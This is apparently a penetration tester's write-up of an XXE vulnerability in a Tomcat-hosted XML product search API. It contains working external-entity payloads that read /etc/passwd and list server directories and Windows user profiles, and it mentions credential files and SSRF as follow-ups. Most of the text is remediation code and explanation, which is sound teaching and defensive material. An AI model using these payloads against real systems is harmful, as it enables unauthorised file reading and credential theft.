XXE Injection to Arbitrary File Read — From a Product Search API

Some vulnerabilities are hidden deep in complex authentication flows or chained across five different endpoints. And then there are the ones sitting right on the surface, waiting for someone to send the right input.

This was a product search API. It accepted XML. It trusted everything inside it.

The Target

During a web application assessment I came across a search feature that submitted product queries to a backend API. Intercepting the request in Burp Suite revealed something immediately interesting: the request body was XML, not JSON.

<products>
    <product>
        <name>invisiblene</name>
        <code>619</code>
        <tags>entertainment</tags>
        <description>test</description>
    </product>
</products>

Any time I see an application parsing XML from user input, XXE goes straight to the top of my checklist.

What is XXE?

XML External Entity (XXE) injection is a vulnerability that exploits the way XML parsers handle external entity references.

XML has a feature called Document Type Definition (DTD) — a way to define the structure and entities of an XML document. An entity is essentially a variable. You can define one like this:

<!DOCTYPE root [
    <!ENTITY greeting "Hello World">
]>
<data>&greeting;</data>

When the parser processes &greeting;, it substitutes it with Hello World. Simple enough.

But XML also supports external entities — entities that load their value from an external source, including the local filesystem:

<!ENTITY xxe SYSTEM "file:///etc/passwd">

When the parser hits &xxe;, it opens /etc/passwd and substitutes the file contents inline. If the application then reflects that value back in the response — you have arbitrary file read.

The root cause is simple: the XML parser is processing external entities from user-supplied input with no restrictions.
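To make the mechanism concrete, here is a minimal local sketch of the same behaviour. It is not the target application's code: the class name DefaultParserDemo, the temp file, and the marker string are all made up for illustration, and it assumes a JDK whose JAXP defaults still allow external entities (true of the releases I have used, but worth verifying on yours).

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;

public class DefaultParserDemo {

    // Parses the XML with an unconfigured factory and returns the root element's text.
    static String parseWithDefaults(String xml) throws Exception {
        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance(); // no hardening applied
        DocumentBuilder builder = factory.newDocumentBuilder();
        Document doc = builder.parse(
                new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
        return doc.getDocumentElement().getTextContent();
    }

    // Writes a throwaway file, then references it through an external entity.
    static String demo() {
        try {
            Path secret = Files.createTempFile("xxe-demo", ".txt");
            try {
                Files.writeString(secret, "local-file-marker");
                String xml = "<!DOCTYPE data [<!ENTITY xxe SYSTEM \"" + secret.toUri() + "\">]>"
                        + "<data>&xxe;</data>";
                return parseWithDefaults(xml);
            } finally {
                Files.deleteIfExists(secret);
            }
        } catch (Exception e) {
            throw new IllegalStateException(e);
        }
    }

    public static void main(String[] args) {
        // If external entities are resolved, the file's contents appear in the parsed text.
        System.out.println(demo());
    }
}
```

Nothing in the XML body itself looks dangerous to the application code: it simply asks the DOM for the element's text, and the parser has already swapped the entity for the file contents by then.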

Step 1 — Confirming XXE

I modified the XML body to inject a DTD with an external entity. The classic proof-of-concept on Linux is /etc/passwd, but this target was a Windows host, so the entity below points at the Tomcat webapps directory instead:

<!DOCTYPE root [
    <!ENTITY xxe SYSTEM "file:///F:\[REDACTED]\Tomcat_9.0.102\webapps">
]>
<products>
    <product>
        <name>invisiblene</name>
        <code>619</code>
        <tags>entertainment</tags>
        <description>&xxe;</description>
    </product>
</products>

The entity &xxe; was placed inside the <description> field — a value that gets reflected back in the API response.

XXE payload injected via Burp Repeater — response reflects Tomcat webapps directory contents

The server responded with 200 OK and the <description> field in the response contained the directory listing of the Tomcat webapps folder:

<description>
    docs
    manager
    ROOT
</description>

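The parser fetched the path, read its contents, and reflected them back without question. Because the path pointed at a directory rather than a file, the Java file: handler returned a listing of its entries. XXE confirmed.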
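The directory listing is consistent with how Java treats file: URLs that point at a directory. The sketch below reproduces that locally without any XML involved. It assumes the parser resolves system identifiers through java.net.URL (my understanding of the JDK's built-in parser, not something I verified on the target), and the class name and temp directory are hypothetical; the three folder names just mirror the response above.

```java
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.io.UncheckedIOException;
import java.net.URL;
import java.nio.file.Files;
import java.nio.file.Path;
import java.util.List;
import java.util.stream.Collectors;

public class FileUrlDirectoryDemo {

    // Opens a file: URL and returns whatever lines the stream yields.
    static List<String> readFileUrl(URL url) {
        try (BufferedReader reader =
                     new BufferedReader(new InputStreamReader(url.openStream()))) {
            return reader.lines().collect(Collectors.toList());
        } catch (IOException e) {
            throw new UncheckedIOException(e);
        }
    }

    // Builds a temp directory with three sub-folders and reads the directory via its file: URL.
    static List<String> demo() {
        try {
            Path dir = Files.createTempDirectory("xxe-dir-demo");
            List<Path> children =
                    List.of(dir.resolve("docs"), dir.resolve("manager"), dir.resolve("ROOT"));
            try {
                for (Path child : children) {
                    Files.createDirectory(child);
                }
                return readFileUrl(dir.toUri().toURL());
            } finally {
                for (Path child : children) {
                    Files.deleteIfExists(child);
                }
                Files.deleteIfExists(dir);
            }
        } catch (IOException e) {
            throw new UncheckedIOException(e);
        }
    }

    public static void main(String[] args) {
        // Each line is the name of one entry in the directory.
        demo().forEach(System.out::println);
    }
}
```

This is why XXE against a Java backend is useful for reconnaissance as well as file read: you can browse the filesystem one directory at a time before deciding which file to pull.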

Step 2 — Escalating on Windows

The server was running Apache Tomcat 9.0.102 on Windows. The F:\ path resolving successfully in Step 1 confirmed a Windows filesystem, so I pivoted to Windows-specific sensitive paths.

On Windows, a reliable target is C:\Users. It holds one profile directory per user, so listing it enumerates the accounts on the machine:

<!DOCTYPE root [
    <!ENTITY haha SYSTEM "file:///C:\Users">
]>
<products>
    <product>
        <name>invisiblene</name>
        <code>619</code>
        <tags>entertainment</tags>
        <description>&haha;</description>
    </product>
</products>

XXE payload targeting C:\Users on Windows: the response lists the user profile directories

The response returned the full contents of C:\Users:

<description>
    All Users
    byeh
    Default
    Default User
    desktop.ini
    Public
</description>

Every user profile on the machine, enumerated in one request. From here the natural next steps would be targeting user-specific directories for SSH keys, credential files, application configs, or any other sensitive data stored on disk.

Why This Happened — Root Cause

The vulnerability exists because the XML parser was left on its default settings. Many XML parsers, including the JAXP parsers built into Java that Tomcat applications typically use, resolve external entities by default.

The developer never explicitly disabled it. There was no restriction on DOCTYPE declarations, no entity allowlist, and no input validation on the XML body.

The vulnerable parser configuration in Java typically looks like this under the hood:

DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
// Missing: factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
// Missing: factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
DocumentBuilder builder = factory.newDocumentBuilder();
Document doc = builder.parse(inputStream); // parses attacker-controlled XML as-is

Two lines of configuration. That’s all it takes to prevent this entirely.

Impact

With arbitrary file read on a Windows server running Tomcat:

User enumeration — all accounts on the machine identified via C:\Users
Configuration files — Tomcat’s conf/tomcat-users.xml can contain manager and admin credentials, stored in plaintext unless digests are configured
Application secrets — database connection strings, API keys, hardcoded passwords in config files
Source code — web application source files readable from the webapps directory
Potential for SSRF — external entities can also point to internal network resources via http:// URIs, enabling server-side request forgery as a secondary attack

Remediation

Fix 1 — Disable DTD processing entirely (recommended):

DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
DocumentBuilder builder = factory.newDocumentBuilder();

This completely blocks DOCTYPE declarations — the attacker can’t define any entities at all.
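A quick way to convince yourself the setting works is to feed the hardened parser a payload and check that it refuses. The following is a sketch under my own naming (DisallowDoctypeDemo and rejects are hypothetical), using only the feature string shown above:

```java
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.xml.sax.SAXException;

public class DisallowDoctypeDemo {

    // Builds a parser that treats any DOCTYPE declaration as a fatal error.
    static DocumentBuilder hardenedBuilder() throws ParserConfigurationException {
        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
        factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        return factory.newDocumentBuilder();
    }

    // Returns true when the hardened parser refuses the document.
    static boolean rejects(String xml) {
        try {
            hardenedBuilder().parse(
                    new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
            return false;
        } catch (SAXException e) {
            return true; // the parser raised a fatal error while reading the document
        } catch (IOException | ParserConfigurationException e) {
            throw new IllegalStateException(e);
        }
    }

    public static void main(String[] args) {
        String payload = "<!DOCTYPE root [<!ENTITY xxe SYSTEM \"file:///etc/passwd\">]>"
                + "<root>&xxe;</root>";
        System.out.println("payload rejected: " + rejects(payload));
        System.out.println("plain XML rejected: " + rejects("<root>plain</root>"));
    }
}
```

The trade-off is that legitimate documents carrying a DOCTYPE are rejected too. For an API like this one, where clients have no reason to send a DTD, that is usually acceptable.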

Fix 2 — Disable external entity and parameter entity processing:

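// Requires: import javax.xml.XMLConstants;
DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
// Stop the parser from resolving external general and parameter entities
factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
// An empty string means no protocol is permitted for external DTDs or schemas
factory.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
factory.setAttribute(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");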
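The practical difference from Fix 1 is that DOCTYPE declarations and internal entities keep working, while external ones are no longer read. Here is a small sketch to check that, assuming the JDK's built-in JAXP implementation (an older third-party parser on the classpath may not accept the two setAttribute calls). The class name, the temp file, and the marker string are hypothetical.

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.xml.sax.SAXException;

public class ExternalEntitiesOffDemo {

    // Applies the four settings from Fix 2 to a fresh factory.
    static DocumentBuilderFactory restrictedFactory() throws Exception {
        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
        factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
        factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        factory.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
        factory.setAttribute(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
        return factory;
    }

    // Returns the root element's text, or "[blocked]" if the parser refuses the document.
    static String textOrBlocked(String xml) {
        try {
            Document doc = restrictedFactory().newDocumentBuilder().parse(
                    new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
            return doc.getDocumentElement().getTextContent();
        } catch (SAXException e) {
            return "[blocked]";
        } catch (Exception e) {
            throw new IllegalStateException(e);
        }
    }

    // Points an external entity at a real temp file and returns what the parser hands back.
    static String demo() {
        try {
            Path secret = Files.createTempFile("xxe-demo", ".txt");
            try {
                Files.writeString(secret, "local-file-marker");
                return textOrBlocked(
                        "<!DOCTYPE data [<!ENTITY xxe SYSTEM \"" + secret.toUri() + "\">]>"
                                + "<data>&xxe;</data>");
            } finally {
                Files.deleteIfExists(secret);
            }
        } catch (Exception e) {
            throw new IllegalStateException(e);
        }
    }

    public static void main(String[] args) {
        String internal = "<!DOCTYPE data [<!ENTITY greeting \"Hello World\">]>"
                + "<data>&greeting;</data>";
        System.out.println("internal entity: " + textOrBlocked(internal));
        System.out.println("external entity leaked file: "
                + demo().contains("local-file-marker"));
    }
}
```

If your application genuinely relies on DTDs, this is the option to reach for. Otherwise Fix 1 is simpler and leaves less room for a missed setting.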

Fix 3 — Switch to a safer data format:

If the API doesn’t strictly require XML, switch to JSON. JSON has no concept of entities or DTDs — the entire attack surface disappears.

{
  "products": [{
    "name": "invisiblene",
    "code": "619",
    "tags": "entertainment",
    "description": "test"
  }]
}

Fix 4 — Use a security-focused XML parsing library:

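Rather than hardening every call site by hand, route all XML parsing through a single wrapper or library that ships with DTDs and external entities disabled. The OWASP XML External Entity Prevention Cheat Sheet lists the exact settings for each Java XML API.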
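If pulling in a dependency is not an option, a small in-house wrapper gives a similar secure-by-default effect. The sketch below is one possible shape, not an existing library: SafeXml and its methods are hypothetical names, and it uses the StAX API (XMLInputFactory) instead of DOM to show that the same idea carries over to Java's other parsers.

```java
import java.io.StringReader;
import java.nio.file.Files;
import java.nio.file.Path;
import javax.xml.stream.XMLInputFactory;
import javax.xml.stream.XMLStreamConstants;
import javax.xml.stream.XMLStreamException;
import javax.xml.stream.XMLStreamReader;

public final class SafeXml {

    private SafeXml() {
    }

    // The only place in the codebase that is allowed to create a StAX factory.
    static XMLInputFactory hardenedFactory() {
        XMLInputFactory factory = XMLInputFactory.newFactory();
        factory.setProperty(XMLInputFactory.SUPPORT_DTD, false);
        factory.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false);
        return factory;
    }

    // Concatenates all character data in the document.
    static String textOf(String xml) throws XMLStreamException {
        XMLStreamReader reader = hardenedFactory().createXMLStreamReader(new StringReader(xml));
        StringBuilder text = new StringBuilder();
        try {
            while (reader.hasNext()) {
                if (reader.next() == XMLStreamConstants.CHARACTERS) {
                    text.append(reader.getText());
                }
            }
        } finally {
            reader.close();
        }
        return text.toString();
    }

    // Same as textOf, but reports a parser refusal as "[blocked]" instead of throwing.
    static String textOrBlocked(String xml) {
        try {
            return textOf(xml);
        } catch (XMLStreamException e) {
            return "[blocked]";
        }
    }

    // Points an external entity at a real temp file and returns what the wrapper hands back.
    static String demo() {
        try {
            Path secret = Files.createTempFile("xxe-demo", ".txt");
            try {
                Files.writeString(secret, "local-file-marker");
                return textOrBlocked(
                        "<!DOCTYPE data [<!ENTITY xxe SYSTEM \"" + secret.toUri() + "\">]>"
                                + "<data>&xxe;</data>");
            } finally {
                Files.deleteIfExists(secret);
            }
        } catch (java.io.IOException e) {
            throw new java.io.UncheckedIOException(e);
        }
    }

    public static void main(String[] args) {
        System.out.println("plain document: " + textOrBlocked("<data>ok</data>"));
        System.out.println("external entity leaked file: "
                + demo().contains("local-file-marker"));
    }
}
```

The design point is the single choke point: once every caller goes through one helper, a code review only has to confirm that nobody instantiates a parser factory anywhere else.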

Key Takeaways

Any application that parses XML from user input should be tested for XXE — it’s one of the first things to check
Many default XML parser configurations are insecure, Java's JAXP defaults among them: external entity processing stays enabled unless you explicitly disable it
XXE is not just /etc/passwd — on Windows targets, pivot to Tomcat configs, user directories, and application secrets
The fix is two lines of Java — there is no excuse for this being in production
If you see XML in a request body, send a DTD — the response will tell you everything
